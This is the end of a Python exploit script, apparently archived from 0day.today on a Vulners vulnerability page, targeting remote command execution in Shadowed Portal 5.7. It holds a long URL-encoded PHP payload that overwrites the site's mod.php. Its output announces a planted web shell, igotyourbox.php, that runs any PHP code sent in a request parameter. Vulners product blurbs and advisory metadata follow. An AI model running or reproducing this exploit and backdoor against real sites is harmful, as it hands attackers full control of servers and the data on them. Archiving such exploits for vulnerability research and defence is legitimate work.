22-1%22+size%3D%222%22+%2F%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctr%3E%3Ctd+colspan%3D%222%22%3EDescription%3A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr%3E%3Ctd+colspan%3D%222%22%3E%0A%0A%3Ctextarea+name%3D%22description%22+cols%3D%2270%22+rows%3D%2210%22%3E%3C%2Ftextarea%3E%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0A%3C%2Ffieldset%3E%3Cbr+%2F%3E%0A%0A%3Cdiv+align%3D%22center%22%3E%3Cinput+type%3D%22submit%22+value%3D%22Upload%22+%2F%3E+%3Cinput+type%3D%22reset%22+value%3D%22Reset%22+%2F%3E%3C%2Fdiv%3E%0A%0A%3C%2Fform%3E%3Cbr+%2F%3E%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aif(%24do+%3D%3D+%22_upload%22)+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+align%3D%22center%22+%24sp_htd%3EFS%3A+Upload%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0AHTML%3B%0A%0Aif(%24ls+%3D%3D+%24login_session)+%7B%0A%0A%24err+%3D+0%3B%0A%0A%24id+%3D+make_code(50)%3B%0A%0A%24product+%3D+alter(%24_POST%5B'product'%5D)%3B%0A%0A%24publisher+%3D+alter(%24_POST%5B'publisher'%5D)%3B%0A%0A%24category+%3D+alter(%24_POST%5B'category'%5D)%3B%0A%0A%24product_website+%3D+alter(%24_POST%5B'product_website'%5D)%3B%0A%0A%24description+%3D+alter(%24_POST%5B'description'%5D)%3B%0A%0A%24ext+%3D+substr(strrchr(%24_FILES%5B'upload'%5D%5B'name'%5D%2C%22.%22)%2C1)%3B%0A%0Aif(blankc(%24_FILES%5B'upload'%5D%5B'name'%5D%2C%22Upload%22))+%7B+%24err+%3D+1%3B+%7D%0A%0Aif(blankc(%24product%2C%22Product%22))+%7B+%24err+%3D+1%3B+%7D%0A%0Aif(blankc(%24category%2C%22Category%22))+%7B+%24err+%3D+1%3B+%7D%0A%0Aif(blankc(%24description%2C%22Description%22))+%7B+%24err+%3D+1%3B+%7D%0A%0Aif(%24_FILES%5B'upload'%5D%5B'size'%5D+%3E+FS_MAX_SIZE)+%7B+derr(%22File+is+too+large.+Limit%3A+%22.%24fs_max_size)%3B+%24err+%3D+1%3B+%7D%0A%0Aif(%24fs_ext_allow+!%3D+%22%22)+%7B%0A%0A%24arr+%3D+explode(%22%2C%22%2C%24fs_ext_allow)%3B%0A%0A%24err+%3D+1%3B%0A%0Aforeach(%24arr+as+%24single)+%7B%0A%0Aif(strtolower(%24ext)+%3D%3D+strtolower(%24single))+%7B+%24err+%3D+0%3B+%7D%0A%0A%7D%0A%0Aif(%24err+%3D%3D+1)+%7B+derr(%22File+extension+(%24ext)+is+not+allowed.+Extensions+allowed+are%3A+%22.str_replace(%22%2C%22%2C%22%2C+%22%2C%24fs_ext_allow))%3B++%7D%0A%0A%7D%0A%0Aelse+%7B%0A%0A%24arr+%3D+explode(%22%2C%22%2C%24fs_ext_unallow)%3B%0A%0Aforeach(%24arr+as+%24single)+%7B%0A%0Aif(strtolower(%24ext)+%3D%3D+strtolower(%24single))+%7B+derr(%22File+extension+(%24single)+is+not+allowed.%22)%3B+%24err+%3D+1%3B+%7D%0A%0A%7D%0A%0A%7D%0A%0Aif(%24err+%3D%3D+0)+%7B%0A%0Aif(move_uploaded_file(%24_FILES%5B'upload'%5D%5B'tmp_name'%5D%2C%24mod_root.%22%2Fuploads%2F%22.%24id))+%7B%0A%0A%24fs_files+%3D+%22%22%3B%0A%0Arequire(%24root.%22%2Fusers%2F%22.strtolower(%24usr).%22.php%22)%3B%0A%0A%24fs_files+.%3D+%22%7C%7C%22+.+%24id%3B%0A%0A%24name+%3D+basename(%24_FILES%5B'upload'%5D%5B'name'%5D)%3B%0A%0A%24author+%3D+%24usr%3B%0A%0A%24date_posted+%3D+%24date%3B%0A%0A%24downloads+%3D+0%3B%0A%0A%24rating+%3D+0%3B%0A%0Aif(%24u_rank+%3E%3D+%24rank_required%5B'mod_admin'%5D)+%7B%0A%0A%24access+%3D+alter(%24_POST%5B'access'%5D)%3B%0A%0A%7D%0A%0Aelse+%7B%0A%0A%24access+%3D+0%3B%0A%0A%7D%0A%0Adefine('FS_WRITE'%2C%22edit%22)%3B%0A%0Arequire(%24mod_root.%22%2Ffs_file.php%22)%3B%0A%0Awf(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22%2C%22w%22%2C%24fs_file)%3B%0A%0Arequire(%24root.%22%2Fuser_info.php%22)%3B%0A%0Awf(%24root.%22%2Fusers%2F%22.strtolower(%24usr).%22.php%22%2C%22w%22%2C%24user_info)%3B%0A%0Aecho+%3C%3C%3CHTML%0A%0AFile+successfully+uploaded.%3Cbr+%2F%3E%0A%0A%3Cdiv+align%3D%22center%22%3E%0A%0A(%3Ca+href%3D%22%24mod_url%26do%3Dview%26id%3D%24id%22%3EView+File%3C%2Fa%3E)%3Cbr+%2F%3E%0A%0A(%3Ca+href%3D%22%24mod_url%26do%3Dmanage%22%3EManage+Uploads%3C%2Fa%3E)%3Cbr+%2F%3E%0A%0A(%3Ca+href%3D%22%24mod_url%26do%3Dupload%22%3EUpload+Another+File%3C%2Fa%3E)%3Cbr+%2F%3E%0A%0A%3C%2Fdiv%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aelse+%7B+derr(%22Failed+to+upload+file.%22)%3B+%7D%0A%0A%7D%0A%0A%7D%0A%0Aelse+%7B+derr(%22Bad+session.%22)%3B+%7D%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aif(%24do+%3D%3D+%22delete_upload%22)+%7B%0A%0Aif(%24ls+%3D%3D+%24login_session)+%7B%0A%0Aif(file_exists(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22))+%7B%0A%0Arequire(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22)%3B%0A%0Aif(strtolower(%24usr)+%3D%3D+strtolower(%24fs_author))+%7B%0A%0Aunlink(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22)%3B%0A%0Aunlink(%24mod_root.%22%2Fuploads%2F%22.%24id)%3B%0A%0Arequire(%24root.%22%2Fusers%2F%22.strtolower(%24usr).%22.php%22)%3B%0A%0A%24fs_files+%3D+str_replace(%22%7C%7C%22.%24id%2C%22%22%2C%24fs_files)%3B%0A%0Arequire(%24root.%22%2Fuser_info.php%22)%3B%0A%0Awf(%24root.%22%2Fusers%2F%22.strtolower(%24usr).%22.php%22%2C%22w%22%2C%24user_info)%3B%0A%0A%7D%0A%0A%7D%0A%0A%24do+%3D+%22manage%22%3B%0A%0A%7D%0A%0A%7D%0A%0Aif(%24do+%3D%3D+%22edit_upload%22)+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+align%3D%22center%22+%24sp_htd%3EEdit+Upload%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0AThis+feature+is+still+under+development.%3Cbr+%2F%3E%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aif(%24do+%3D%3D+%22manage%22)+%7B%0A%0Arequire(%24root.%22%2Fusers%2F%22.strtolower(%24usr).%22.php%22)%3B%0A%0Aif(%24fs_files+%3D%3D+%22%22)+%7B%0A%0A%24uploaded_files+%3D+0%3B%0A%0A%7D%0A%0Aelse+%7B%0A%0A%24uploaded_files+%3D+count(explode(%22%7C%7C%22%2C%24fs_files))+-+1%3B%0A%0A%7D%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+align%3D%22center%22+%24sp_htd%3EStats%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0A%24uploaded_files+uploaded+files.%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%3Cbr+%2F%3E%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+colspan%3D%226%22+align%3D%22center%22+%24sp_htd%3EUploaded+Files%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+width%3D%2240%25%22+%24sp_htd%3EName%3C%2Ftd%3E%3Ctd+width%3D%2220%25%22+%24sp_htd%3EDate+Added%3C%2Ftd%3E%3Ctd+width%3D%2215%25%22+%24sp_htd%3ERating%3C%2Ftd%3E%3Ctd+width%3D%2215%25%22+%24sp_htd%3EDownloads%3C%2Ftd%3E%3Ctd+width%3D%2220%25%22+%24sp_htd%3ESize%3C%2Ftd%3E%3Ctd+width%3D%2210%25%22+%24sp_htd%3EAction%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0A%24arr+%3D+explode(%22%7C%7C%22%2C%24fs_files)%3B%0A%0A%24x+%3D+0%3B%0A%0Aforeach(%24arr+as+%24single)+%7B%0A%0Aif(%24single+!%3D+%22%22)+%7B%0A%0Aif(file_exists(%24mod_root.%22%2Ffiles%2F%22.%24single.%22.php%22))+%7B%0A%0Arequire(%24mod_root.%22%2Ffiles%2F%22.%24single.%22.php%22)%3B%0A%0A%24fs_size+%3D+filesize(%24mod_root.%22%2Ffiles%2F%22.%24single.%22.php%22)%3B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Ca+href%3D%22%24mod_url%26do%3Dview%26id%3D%24single%22%3E%24fs_product+(%24fs_name)%3C%2Fa%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_date%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_rating%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_downloads%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_size%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%3Ca+href%3D%22%24mod_url%26do%3Dedit_upload%26id%3D%24single%22+alt%3D%22Edit%22%3E%5BE%5D%3C%2Fa%3E+%3Ca+href%3D%22%24mod_url%26do%3Ddelete_upload%26id%3D%24single%26ls%3D%24login_session%22+alt%3D%22Delete%22%3E%5BX%5D%3C%2Fa%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0A%24x%2B%2B%3B%0A%0A%7D%0A%0A%7D%0A%0A%7D%0A%0Aif(%24x+%3D%3D+0)+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+colspan%3D%226%22+align%3D%22center%22+%24sp_ctd%3ENo+files+uploaded.%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+colspan%3D%226%22+align%3D%22right%22+%24sp_ctd%3E%3Ca+href%3D%22%24mod_url%26do%3Dupload%22%3EUpload+File%3C%2Fa%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0AHTML%3B%0A%0A%7D%0A%0A%7D%0A%0A%3F%3E\")); fclose($r0x);die;"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[+]Repairing mod.php... -->",response.status, response.reason
conn.close()
print "[+]Done."

print "[+]Success :D Exploited.\n\n A PHP Page Has Been Created -> %s%sigotyourbox.php \n With Content:\n <?php eval(stripslashes($_REQUEST[dox])); ?>\n Execute your php codes :P Have Fun :D\n\n-= Paradox Got This One :D =-\n" % (target,path)



#  0day.today [2018-03-28]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Dec 2007 00:00Current
7.1High risk
Vulners AI Score7.1
shadowed portal 5.7remote command executionvulnerabilitiesshad0wed.comhighest severitythe:paradoxphpfile upload
39